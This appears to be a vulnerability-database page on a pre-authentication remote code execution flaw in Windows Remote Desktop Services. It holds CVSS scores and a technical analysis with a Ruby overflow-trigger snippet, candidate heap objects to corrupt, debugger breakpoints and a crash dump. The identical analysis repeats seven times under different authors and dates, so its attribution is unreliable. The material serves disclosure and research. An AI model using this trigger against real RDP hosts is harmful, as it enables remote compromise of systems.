9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
A remote code execution vulnerability exists in Remote Desktop Services – formerly known as Terminal Services – when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. This vulnerability is pre-authentication and requires no user interaction. An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.
To exploit this vulnerability, an attacker would need to send a specially crafted request to the target systems Remote Desktop Service via RDP.
The update addresses the vulnerability by correcting how Remote Desktop Services handles connection requests.
Recent assessments:
zeroSteiner at November 14, 2019 5:12pm UTC reported:
Analysis performed using rdpcorets.dll from Windows 8.1 x64 (sha256: c9d1f3c0a9459c67e96115041d622808decc31f9a9b7e3b4806421557f09cda1
)
The vulnerability exists within rdpcorets.dll
loaded in the process svchost.exe -k NetworkService
running as NT AUTHORITY\NETWORK SERVICE
. This is started by the service “Remote Desktop Services”.
The bug is triggered by sending a specially crafted request over the drdynvc
channel which must be setup. Use the flags RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP
when initializing it.
After the DynVC channel has been initialized, the overflow is triggered by sending segmented data (DYNVC_DATA_COMPRESSED
) frame, see MS-RDPEDYC:25 for details. Note that segmented data is different than a data segment.
The compressed frame includes a payload as defined in MS-RDPEGFX section 2.2.5. The below snippet can be used to build a compatible data segment. The RDP segmented data field contains a length field which is the root cause of the vulnerability.
# see [MS-RDPEGFX] section 2.2.5.2
def build_rdp_data_segment(data)
# RDP_DATA_SEGMENT
encoded = [data.length + 1].pack("L<")
encoded << "\x04"
encoded << data
end
def build_trigger
# see [MS-RDPEGFX] section 2.2.5
rdp_data_segment = build_rdp_data_segment(("\x41" * 0x50) + [0xdead1337dead1337].pack('Q'))
rdp_segmented_data = [0xe1, 1, 0x40 - 0x2000].pack("CS<l<") + rdp_data_segment
end
An object needs to be created and corrupted, potential candidates are below.
Object Name | Breakpoint Address | Size | Can Create? |
---|---|---|---|
CRdpDynVCMgr ChannelInternal | rdpcorets+c8e03 |
0x138 | Static number can be created |
DecompressRdp8 | rdpcorets+16274a |
0x68 | |
DecompressUnchopper | rdpcorets+12dd1a |
0x48 |
rdpcorets+f67dc ".printf \"CRdpDynVCMgr::HandleIncomingDvcData\\n\"; db rdx"
rdpcorets+1dcc89 ".printf \"memcpy(dst=%N, src=%N, size=%N)\\n\", rcx, rdx, r8; g
memcpy
call that copies the buffer to the target and overflows itrdpcorets+c9538 ".printf \"CRdpDynVC::Initialize\\n\"; g"
msvcrt+1e00 ".printf \"operator new(size=%N)\", rcx; gu; .printf \" = %N\\n\", rax; g"
The following stack trace was taken during a RAV after having corrupted an object using the target memcpy call.
0:001> g
(138c.13b4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014 mov qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????
0:033> k
Child-SP RetAddr Call Site
00000050`beaaf478 00007fff`a5b79c7f rdpcorets+0xd9d36
00000050`beaaf480 00007fff`a5b7c3bf rdpcorets+0xd9c7f
00000050`beaaf4c0 00007fff`a5b91190 rdpcorets+0xdc3bf
00000050`beaaf5f0 00007fff`a5b90cb1 rdpcorets+0xf1190
00000050`beaaf690 00007fff`a5bf2893 rdpcorets+0xf0cb1
00000050`beaaf720 00007fff`c9ed13d2 rdpcorets!DllGetClassObject+0x75b3
00000050`beaaf7e0 00007fff`caf654f4 KERNEL32!BaseThreadInitThunk+0x22
00000050`beaaf810 00000000`00000000 ntdll!RtlUserThreadStart+0x34
0:033> u
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014 mov qword ptr [r8+14h],rdx
00007fff`a5b79d3a 498d5028 lea rdx,[r8+28h]
00007fff`a5b79d3e 41c7401038000000 mov dword ptr [r8+10h],38h
00007fff`a5b79d46 4d89481c mov qword ptr [r8+1Ch],r9
00007fff`a5b79d4a 45894824 mov dword ptr [r8+24h],r9d
00007fff`a5b79d4e 8d0c8510000000 lea ecx,[rax*4+10h]
00007fff`a5b79d55 4803ca add rcx,rdx
00007fff`a5b79d58 44890a mov dword ptr [rdx],r9d
0:033> r
rax=0000000000000000 rbx=00007fffa5b79d10 rcx=00000050bf0c1940
rdx=0000000000000001 rsi=00000050bdcba9a0 rdi=00000050bf0c1940
rip=00007fffa5b79d36 rsp=00000050beaaf478 rbp=00000050bf0c7450
r8=4141414141414141 r9=0000000000000000 r10=0000000000000007
r11=00000050beaaf4b8 r12=00000050bf0c1f40 r13=00000050bf0c23c0
r14=0000000000000000 r15=00000050bdccfdc0
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014 mov qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????
busterb at August 13, 2019 5:48pm UTC reported:
Analysis performed using rdpcorets.dll from Windows 8.1 x64 (sha256: c9d1f3c0a9459c67e96115041d622808decc31f9a9b7e3b4806421557f09cda1
)
The vulnerability exists within rdpcorets.dll
loaded in the process svchost.exe -k NetworkService
running as NT AUTHORITY\NETWORK SERVICE
. This is started by the service “Remote Desktop Services”.
The bug is triggered by sending a specially crafted request over the drdynvc
channel which must be setup. Use the flags RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP
when initializing it.
After the DynVC channel has been initialized, the overflow is triggered by sending segmented data (DYNVC_DATA_COMPRESSED
) frame, see MS-RDPEDYC:25 for details. Note that segmented data is different than a data segment.
The compressed frame includes a payload as defined in MS-RDPEGFX section 2.2.5. The below snippet can be used to build a compatible data segment. The RDP segmented data field contains a length field which is the root cause of the vulnerability.
# see [MS-RDPEGFX] section 2.2.5.2
def build_rdp_data_segment(data)
# RDP_DATA_SEGMENT
encoded = [data.length + 1].pack("L<")
encoded << "\x04"
encoded << data
end
def build_trigger
# see [MS-RDPEGFX] section 2.2.5
rdp_data_segment = build_rdp_data_segment(("\x41" * 0x50) + [0xdead1337dead1337].pack('Q'))
rdp_segmented_data = [0xe1, 1, 0x40 - 0x2000].pack("CS<l<") + rdp_data_segment
end
An object needs to be created and corrupted, potential candidates are below.
Object Name | Breakpoint Address | Size | Can Create? |
---|---|---|---|
CRdpDynVCMgr ChannelInternal | rdpcorets+c8e03 |
0x138 | Static number can be created |
DecompressRdp8 | rdpcorets+16274a |
0x68 | |
DecompressUnchopper | rdpcorets+12dd1a |
0x48 |
rdpcorets+f67dc ".printf \"CRdpDynVCMgr::HandleIncomingDvcData\\n\"; db rdx"
rdpcorets+1dcc89 ".printf \"memcpy(dst=%N, src=%N, size=%N)\\n\", rcx, rdx, r8; g
memcpy
call that copies the buffer to the target and overflows itrdpcorets+c9538 ".printf \"CRdpDynVC::Initialize\\n\"; g"
msvcrt+1e00 ".printf \"operator new(size=%N)\", rcx; gu; .printf \" = %N\\n\", rax; g"
The following stack trace was taken during a RAV after having corrupted an object using the target memcpy call.
0:001> g
(138c.13b4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014 mov qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????
0:033> k
Child-SP RetAddr Call Site
00000050`beaaf478 00007fff`a5b79c7f rdpcorets+0xd9d36
00000050`beaaf480 00007fff`a5b7c3bf rdpcorets+0xd9c7f
00000050`beaaf4c0 00007fff`a5b91190 rdpcorets+0xdc3bf
00000050`beaaf5f0 00007fff`a5b90cb1 rdpcorets+0xf1190
00000050`beaaf690 00007fff`a5bf2893 rdpcorets+0xf0cb1
00000050`beaaf720 00007fff`c9ed13d2 rdpcorets!DllGetClassObject+0x75b3
00000050`beaaf7e0 00007fff`caf654f4 KERNEL32!BaseThreadInitThunk+0x22
00000050`beaaf810 00000000`00000000 ntdll!RtlUserThreadStart+0x34
0:033> u
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014 mov qword ptr [r8+14h],rdx
00007fff`a5b79d3a 498d5028 lea rdx,[r8+28h]
00007fff`a5b79d3e 41c7401038000000 mov dword ptr [r8+10h],38h
00007fff`a5b79d46 4d89481c mov qword ptr [r8+1Ch],r9
00007fff`a5b79d4a 45894824 mov dword ptr [r8+24h],r9d
00007fff`a5b79d4e 8d0c8510000000 lea ecx,[rax*4+10h]
00007fff`a5b79d55 4803ca add rcx,rdx
00007fff`a5b79d58 44890a mov dword ptr [rdx],r9d
0:033> r
rax=0000000000000000 rbx=00007fffa5b79d10 rcx=00000050bf0c1940
rdx=0000000000000001 rsi=00000050bdcba9a0 rdi=00000050bf0c1940
rip=00007fffa5b79d36 rsp=00000050beaaf478 rbp=00000050bf0c7450
r8=4141414141414141 r9=0000000000000000 r10=0000000000000007
r11=00000050beaaf4b8 r12=00000050bf0c1f40 r13=00000050bf0c23c0
r14=0000000000000000 r15=00000050bdccfdc0
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014 mov qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????
bwatters-r7 at August 22, 2019 10:14pm UTC reported:
Analysis performed using rdpcorets.dll from Windows 8.1 x64 (sha256: c9d1f3c0a9459c67e96115041d622808decc31f9a9b7e3b4806421557f09cda1
)
The vulnerability exists within rdpcorets.dll
loaded in the process svchost.exe -k NetworkService
running as NT AUTHORITY\NETWORK SERVICE
. This is started by the service “Remote Desktop Services”.
The bug is triggered by sending a specially crafted request over the drdynvc
channel which must be setup. Use the flags RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP
when initializing it.
After the DynVC channel has been initialized, the overflow is triggered by sending segmented data (DYNVC_DATA_COMPRESSED
) frame, see MS-RDPEDYC:25 for details. Note that segmented data is different than a data segment.
The compressed frame includes a payload as defined in MS-RDPEGFX section 2.2.5. The below snippet can be used to build a compatible data segment. The RDP segmented data field contains a length field which is the root cause of the vulnerability.
# see [MS-RDPEGFX] section 2.2.5.2
def build_rdp_data_segment(data)
# RDP_DATA_SEGMENT
encoded = [data.length + 1].pack("L<")
encoded << "\x04"
encoded << data
end
def build_trigger
# see [MS-RDPEGFX] section 2.2.5
rdp_data_segment = build_rdp_data_segment(("\x41" * 0x50) + [0xdead1337dead1337].pack('Q'))
rdp_segmented_data = [0xe1, 1, 0x40 - 0x2000].pack("CS<l<") + rdp_data_segment
end
An object needs to be created and corrupted, potential candidates are below.
Object Name | Breakpoint Address | Size | Can Create? |
---|---|---|---|
CRdpDynVCMgr ChannelInternal | rdpcorets+c8e03 |
0x138 | Static number can be created |
DecompressRdp8 | rdpcorets+16274a |
0x68 | |
DecompressUnchopper | rdpcorets+12dd1a |
0x48 |
rdpcorets+f67dc ".printf \"CRdpDynVCMgr::HandleIncomingDvcData\\n\"; db rdx"
rdpcorets+1dcc89 ".printf \"memcpy(dst=%N, src=%N, size=%N)\\n\", rcx, rdx, r8; g
memcpy
call that copies the buffer to the target and overflows itrdpcorets+c9538 ".printf \"CRdpDynVC::Initialize\\n\"; g"
msvcrt+1e00 ".printf \"operator new(size=%N)\", rcx; gu; .printf \" = %N\\n\", rax; g"
The following stack trace was taken during a RAV after having corrupted an object using the target memcpy call.
0:001> g
(138c.13b4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014 mov qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????
0:033> k
Child-SP RetAddr Call Site
00000050`beaaf478 00007fff`a5b79c7f rdpcorets+0xd9d36
00000050`beaaf480 00007fff`a5b7c3bf rdpcorets+0xd9c7f
00000050`beaaf4c0 00007fff`a5b91190 rdpcorets+0xdc3bf
00000050`beaaf5f0 00007fff`a5b90cb1 rdpcorets+0xf1190
00000050`beaaf690 00007fff`a5bf2893 rdpcorets+0xf0cb1
00000050`beaaf720 00007fff`c9ed13d2 rdpcorets!DllGetClassObject+0x75b3
00000050`beaaf7e0 00007fff`caf654f4 KERNEL32!BaseThreadInitThunk+0x22
00000050`beaaf810 00000000`00000000 ntdll!RtlUserThreadStart+0x34
0:033> u
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014 mov qword ptr [r8+14h],rdx
00007fff`a5b79d3a 498d5028 lea rdx,[r8+28h]
00007fff`a5b79d3e 41c7401038000000 mov dword ptr [r8+10h],38h
00007fff`a5b79d46 4d89481c mov qword ptr [r8+1Ch],r9
00007fff`a5b79d4a 45894824 mov dword ptr [r8+24h],r9d
00007fff`a5b79d4e 8d0c8510000000 lea ecx,[rax*4+10h]
00007fff`a5b79d55 4803ca add rcx,rdx
00007fff`a5b79d58 44890a mov dword ptr [rdx],r9d
0:033> r
rax=0000000000000000 rbx=00007fffa5b79d10 rcx=00000050bf0c1940
rdx=0000000000000001 rsi=00000050bdcba9a0 rdi=00000050bf0c1940
rip=00007fffa5b79d36 rsp=00000050beaaf478 rbp=00000050bf0c7450
r8=4141414141414141 r9=0000000000000000 r10=0000000000000007
r11=00000050beaaf4b8 r12=00000050bf0c1f40 r13=00000050bf0c23c0
r14=0000000000000000 r15=00000050bdccfdc0
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014 mov qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????
sgonzalez-r7 at August 26, 2019 4:32pm UTC reported:
Analysis performed using rdpcorets.dll from Windows 8.1 x64 (sha256: c9d1f3c0a9459c67e96115041d622808decc31f9a9b7e3b4806421557f09cda1
)
The vulnerability exists within rdpcorets.dll
loaded in the process svchost.exe -k NetworkService
running as NT AUTHORITY\NETWORK SERVICE
. This is started by the service “Remote Desktop Services”.
The bug is triggered by sending a specially crafted request over the drdynvc
channel which must be setup. Use the flags RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP
when initializing it.
After the DynVC channel has been initialized, the overflow is triggered by sending segmented data (DYNVC_DATA_COMPRESSED
) frame, see MS-RDPEDYC:25 for details. Note that segmented data is different than a data segment.
The compressed frame includes a payload as defined in MS-RDPEGFX section 2.2.5. The below snippet can be used to build a compatible data segment. The RDP segmented data field contains a length field which is the root cause of the vulnerability.
# see [MS-RDPEGFX] section 2.2.5.2
def build_rdp_data_segment(data)
# RDP_DATA_SEGMENT
encoded = [data.length + 1].pack("L<")
encoded << "\x04"
encoded << data
end
def build_trigger
# see [MS-RDPEGFX] section 2.2.5
rdp_data_segment = build_rdp_data_segment(("\x41" * 0x50) + [0xdead1337dead1337].pack('Q'))
rdp_segmented_data = [0xe1, 1, 0x40 - 0x2000].pack("CS<l<") + rdp_data_segment
end
An object needs to be created and corrupted, potential candidates are below.
Object Name | Breakpoint Address | Size | Can Create? |
---|---|---|---|
CRdpDynVCMgr ChannelInternal | rdpcorets+c8e03 |
0x138 | Static number can be created |
DecompressRdp8 | rdpcorets+16274a |
0x68 | |
DecompressUnchopper | rdpcorets+12dd1a |
0x48 |
rdpcorets+f67dc ".printf \"CRdpDynVCMgr::HandleIncomingDvcData\\n\"; db rdx"
rdpcorets+1dcc89 ".printf \"memcpy(dst=%N, src=%N, size=%N)\\n\", rcx, rdx, r8; g
memcpy
call that copies the buffer to the target and overflows itrdpcorets+c9538 ".printf \"CRdpDynVC::Initialize\\n\"; g"
msvcrt+1e00 ".printf \"operator new(size=%N)\", rcx; gu; .printf \" = %N\\n\", rax; g"
The following stack trace was taken during a RAV after having corrupted an object using the target memcpy call.
0:001> g
(138c.13b4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014 mov qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????
0:033> k
Child-SP RetAddr Call Site
00000050`beaaf478 00007fff`a5b79c7f rdpcorets+0xd9d36
00000050`beaaf480 00007fff`a5b7c3bf rdpcorets+0xd9c7f
00000050`beaaf4c0 00007fff`a5b91190 rdpcorets+0xdc3bf
00000050`beaaf5f0 00007fff`a5b90cb1 rdpcorets+0xf1190
00000050`beaaf690 00007fff`a5bf2893 rdpcorets+0xf0cb1
00000050`beaaf720 00007fff`c9ed13d2 rdpcorets!DllGetClassObject+0x75b3
00000050`beaaf7e0 00007fff`caf654f4 KERNEL32!BaseThreadInitThunk+0x22
00000050`beaaf810 00000000`00000000 ntdll!RtlUserThreadStart+0x34
0:033> u
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014 mov qword ptr [r8+14h],rdx
00007fff`a5b79d3a 498d5028 lea rdx,[r8+28h]
00007fff`a5b79d3e 41c7401038000000 mov dword ptr [r8+10h],38h
00007fff`a5b79d46 4d89481c mov qword ptr [r8+1Ch],r9
00007fff`a5b79d4a 45894824 mov dword ptr [r8+24h],r9d
00007fff`a5b79d4e 8d0c8510000000 lea ecx,[rax*4+10h]
00007fff`a5b79d55 4803ca add rcx,rdx
00007fff`a5b79d58 44890a mov dword ptr [rdx],r9d
0:033> r
rax=0000000000000000 rbx=00007fffa5b79d10 rcx=00000050bf0c1940
rdx=0000000000000001 rsi=00000050bdcba9a0 rdi=00000050bf0c1940
rip=00007fffa5b79d36 rsp=00000050beaaf478 rbp=00000050bf0c7450
r8=4141414141414141 r9=0000000000000000 r10=0000000000000007
r11=00000050beaaf4b8 r12=00000050bf0c1f40 r13=00000050bf0c23c0
r14=0000000000000000 r15=00000050bdccfdc0
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014 mov qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????
space-r7 at August 19, 2019 7:17pm UTC reported:
Analysis performed using rdpcorets.dll from Windows 8.1 x64 (sha256: c9d1f3c0a9459c67e96115041d622808decc31f9a9b7e3b4806421557f09cda1
)
The vulnerability exists within rdpcorets.dll
loaded in the process svchost.exe -k NetworkService
running as NT AUTHORITY\NETWORK SERVICE
. This is started by the service “Remote Desktop Services”.
The bug is triggered by sending a specially crafted request over the drdynvc
channel which must be setup. Use the flags RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP
when initializing it.
After the DynVC channel has been initialized, the overflow is triggered by sending segmented data (DYNVC_DATA_COMPRESSED
) frame, see MS-RDPEDYC:25 for details. Note that segmented data is different than a data segment.
The compressed frame includes a payload as defined in MS-RDPEGFX section 2.2.5. The below snippet can be used to build a compatible data segment. The RDP segmented data field contains a length field which is the root cause of the vulnerability.
# see [MS-RDPEGFX] section 2.2.5.2
def build_rdp_data_segment(data)
# RDP_DATA_SEGMENT
encoded = [data.length + 1].pack("L<")
encoded << "\x04"
encoded << data
end
def build_trigger
# see [MS-RDPEGFX] section 2.2.5
rdp_data_segment = build_rdp_data_segment(("\x41" * 0x50) + [0xdead1337dead1337].pack('Q'))
rdp_segmented_data = [0xe1, 1, 0x40 - 0x2000].pack("CS<l<") + rdp_data_segment
end
An object needs to be created and corrupted, potential candidates are below.
Object Name | Breakpoint Address | Size | Can Create? |
---|---|---|---|
CRdpDynVCMgr ChannelInternal | rdpcorets+c8e03 |
0x138 | Static number can be created |
DecompressRdp8 | rdpcorets+16274a |
0x68 | |
DecompressUnchopper | rdpcorets+12dd1a |
0x48 |
rdpcorets+f67dc ".printf \"CRdpDynVCMgr::HandleIncomingDvcData\\n\"; db rdx"
rdpcorets+1dcc89 ".printf \"memcpy(dst=%N, src=%N, size=%N)\\n\", rcx, rdx, r8; g
memcpy
call that copies the buffer to the target and overflows itrdpcorets+c9538 ".printf \"CRdpDynVC::Initialize\\n\"; g"
msvcrt+1e00 ".printf \"operator new(size=%N)\", rcx; gu; .printf \" = %N\\n\", rax; g"
The following stack trace was taken during a RAV after having corrupted an object using the target memcpy call.
0:001> g
(138c.13b4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014 mov qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????
0:033> k
Child-SP RetAddr Call Site
00000050`beaaf478 00007fff`a5b79c7f rdpcorets+0xd9d36
00000050`beaaf480 00007fff`a5b7c3bf rdpcorets+0xd9c7f
00000050`beaaf4c0 00007fff`a5b91190 rdpcorets+0xdc3bf
00000050`beaaf5f0 00007fff`a5b90cb1 rdpcorets+0xf1190
00000050`beaaf690 00007fff`a5bf2893 rdpcorets+0xf0cb1
00000050`beaaf720 00007fff`c9ed13d2 rdpcorets!DllGetClassObject+0x75b3
00000050`beaaf7e0 00007fff`caf654f4 KERNEL32!BaseThreadInitThunk+0x22
00000050`beaaf810 00000000`00000000 ntdll!RtlUserThreadStart+0x34
0:033> u
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014 mov qword ptr [r8+14h],rdx
00007fff`a5b79d3a 498d5028 lea rdx,[r8+28h]
00007fff`a5b79d3e 41c7401038000000 mov dword ptr [r8+10h],38h
00007fff`a5b79d46 4d89481c mov qword ptr [r8+1Ch],r9
00007fff`a5b79d4a 45894824 mov dword ptr [r8+24h],r9d
00007fff`a5b79d4e 8d0c8510000000 lea ecx,[rax*4+10h]
00007fff`a5b79d55 4803ca add rcx,rdx
00007fff`a5b79d58 44890a mov dword ptr [rdx],r9d
0:033> r
rax=0000000000000000 rbx=00007fffa5b79d10 rcx=00000050bf0c1940
rdx=0000000000000001 rsi=00000050bdcba9a0 rdi=00000050bf0c1940
rip=00007fffa5b79d36 rsp=00000050beaaf478 rbp=00000050bf0c7450
r8=4141414141414141 r9=0000000000000000 r10=0000000000000007
r11=00000050beaaf4b8 r12=00000050bf0c1f40 r13=00000050bf0c23c0
r14=0000000000000000 r15=00000050bdccfdc0
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014 mov qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????
wvu-r7 at August 22, 2019 10:37pm UTC reported:
Analysis performed using rdpcorets.dll from Windows 8.1 x64 (sha256: c9d1f3c0a9459c67e96115041d622808decc31f9a9b7e3b4806421557f09cda1
)
The vulnerability exists within rdpcorets.dll
loaded in the process svchost.exe -k NetworkService
running as NT AUTHORITY\NETWORK SERVICE
. This is started by the service “Remote Desktop Services”.
The bug is triggered by sending a specially crafted request over the drdynvc
channel which must be setup. Use the flags RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP
when initializing it.
After the DynVC channel has been initialized, the overflow is triggered by sending segmented data (DYNVC_DATA_COMPRESSED
) frame, see MS-RDPEDYC:25 for details. Note that segmented data is different than a data segment.
The compressed frame includes a payload as defined in MS-RDPEGFX section 2.2.5. The below snippet can be used to build a compatible data segment. The RDP segmented data field contains a length field which is the root cause of the vulnerability.
# see [MS-RDPEGFX] section 2.2.5.2
def build_rdp_data_segment(data)
# RDP_DATA_SEGMENT
encoded = [data.length + 1].pack("L<")
encoded << "\x04"
encoded << data
end
def build_trigger
# see [MS-RDPEGFX] section 2.2.5
rdp_data_segment = build_rdp_data_segment(("\x41" * 0x50) + [0xdead1337dead1337].pack('Q'))
rdp_segmented_data = [0xe1, 1, 0x40 - 0x2000].pack("CS<l<") + rdp_data_segment
end
An object needs to be created and corrupted, potential candidates are below.
Object Name | Breakpoint Address | Size | Can Create? |
---|---|---|---|
CRdpDynVCMgr ChannelInternal | rdpcorets+c8e03 |
0x138 | Static number can be created |
DecompressRdp8 | rdpcorets+16274a |
0x68 | |
DecompressUnchopper | rdpcorets+12dd1a |
0x48 |
rdpcorets+f67dc ".printf \"CRdpDynVCMgr::HandleIncomingDvcData\\n\"; db rdx"
rdpcorets+1dcc89 ".printf \"memcpy(dst=%N, src=%N, size=%N)\\n\", rcx, rdx, r8; g
memcpy
call that copies the buffer to the target and overflows itrdpcorets+c9538 ".printf \"CRdpDynVC::Initialize\\n\"; g"
msvcrt+1e00 ".printf \"operator new(size=%N)\", rcx; gu; .printf \" = %N\\n\", rax; g"
The following stack trace was taken during a RAV after having corrupted an object using the target memcpy call.
0:001> g
(138c.13b4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014 mov qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????
0:033> k
Child-SP RetAddr Call Site
00000050`beaaf478 00007fff`a5b79c7f rdpcorets+0xd9d36
00000050`beaaf480 00007fff`a5b7c3bf rdpcorets+0xd9c7f
00000050`beaaf4c0 00007fff`a5b91190 rdpcorets+0xdc3bf
00000050`beaaf5f0 00007fff`a5b90cb1 rdpcorets+0xf1190
00000050`beaaf690 00007fff`a5bf2893 rdpcorets+0xf0cb1
00000050`beaaf720 00007fff`c9ed13d2 rdpcorets!DllGetClassObject+0x75b3
00000050`beaaf7e0 00007fff`caf654f4 KERNEL32!BaseThreadInitThunk+0x22
00000050`beaaf810 00000000`00000000 ntdll!RtlUserThreadStart+0x34
0:033> u
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014 mov qword ptr [r8+14h],rdx
00007fff`a5b79d3a 498d5028 lea rdx,[r8+28h]
00007fff`a5b79d3e 41c7401038000000 mov dword ptr [r8+10h],38h
00007fff`a5b79d46 4d89481c mov qword ptr [r8+1Ch],r9
00007fff`a5b79d4a 45894824 mov dword ptr [r8+24h],r9d
00007fff`a5b79d4e 8d0c8510000000 lea ecx,[rax*4+10h]
00007fff`a5b79d55 4803ca add rcx,rdx
00007fff`a5b79d58 44890a mov dword ptr [rdx],r9d
0:033> r
rax=0000000000000000 rbx=00007fffa5b79d10 rcx=00000050bf0c1940
rdx=0000000000000001 rsi=00000050bdcba9a0 rdi=00000050bf0c1940
rip=00007fffa5b79d36 rsp=00000050beaaf478 rbp=00000050bf0c7450
r8=4141414141414141 r9=0000000000000000 r10=0000000000000007
r11=00000050beaaf4b8 r12=00000050bf0c1f40 r13=00000050bf0c23c0
r14=0000000000000000 r15=00000050bdccfdc0
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014 mov qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????
ccondon-r7 at September 13, 2019 8:20pm UTC reported:
Analysis performed using rdpcorets.dll from Windows 8.1 x64 (sha256: c9d1f3c0a9459c67e96115041d622808decc31f9a9b7e3b4806421557f09cda1
)
The vulnerability exists within rdpcorets.dll
loaded in the process svchost.exe -k NetworkService
running as NT AUTHORITY\NETWORK SERVICE
. This is started by the service “Remote Desktop Services”.
The bug is triggered by sending a specially crafted request over the drdynvc
channel which must be setup. Use the flags RDPConstants::CHAN_INITIALIZED | RDPConstants::CHAN_ENCRYPT_RDP
when initializing it.
After the DynVC channel has been initialized, the overflow is triggered by sending segmented data (DYNVC_DATA_COMPRESSED
) frame, see MS-RDPEDYC:25 for details. Note that segmented data is different than a data segment.
The compressed frame includes a payload as defined in MS-RDPEGFX section 2.2.5. The below snippet can be used to build a compatible data segment. The RDP segmented data field contains a length field which is the root cause of the vulnerability.
# see [MS-RDPEGFX] section 2.2.5.2
def build_rdp_data_segment(data)
# RDP_DATA_SEGMENT
encoded = [data.length + 1].pack("L<")
encoded << "\x04"
encoded << data
end
def build_trigger
# see [MS-RDPEGFX] section 2.2.5
rdp_data_segment = build_rdp_data_segment(("\x41" * 0x50) + [0xdead1337dead1337].pack('Q'))
rdp_segmented_data = [0xe1, 1, 0x40 - 0x2000].pack("CS<l<") + rdp_data_segment
end
An object needs to be created and corrupted, potential candidates are below.
Object Name | Breakpoint Address | Size | Can Create? |
---|---|---|---|
CRdpDynVCMgr ChannelInternal | rdpcorets+c8e03 |
0x138 | Static number can be created |
DecompressRdp8 | rdpcorets+16274a |
0x68 | |
DecompressUnchopper | rdpcorets+12dd1a |
0x48 |
rdpcorets+f67dc ".printf \"CRdpDynVCMgr::HandleIncomingDvcData\\n\"; db rdx"
rdpcorets+1dcc89 ".printf \"memcpy(dst=%N, src=%N, size=%N)\\n\", rcx, rdx, r8; g
memcpy
call that copies the buffer to the target and overflows itrdpcorets+c9538 ".printf \"CRdpDynVC::Initialize\\n\"; g"
msvcrt+1e00 ".printf \"operator new(size=%N)\", rcx; gu; .printf \" = %N\\n\", rax; g"
The following stack trace was taken during a RAV after having corrupted an object using the target memcpy call.
0:001> g
(138c.13b4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
rdpcorets+0xd9d36:
00007fff`a5b79d36 49895014 mov qword ptr [r8+14h],rdx ds:41414141`41414155=????????????????
0:033> k
Child-SP RetAddr Call Site
00000050`beaaf478 00007fff`a5b79c7f rdpcorets+0xd9d36
00000050`beaaf480 00007fff`a5b7c3bf rdpcorets+0xd9c7f
00000050`beaaf4c0 00007fff`a5b91190 rdpcorets+0xdc3bf
00000050`beaaf5f0 00007fff`a5b90cb1 rdpcorets+0xf1190
00000050`beaaf690 00007fff`a5bf2893 rdpcorets+0xf0cb1
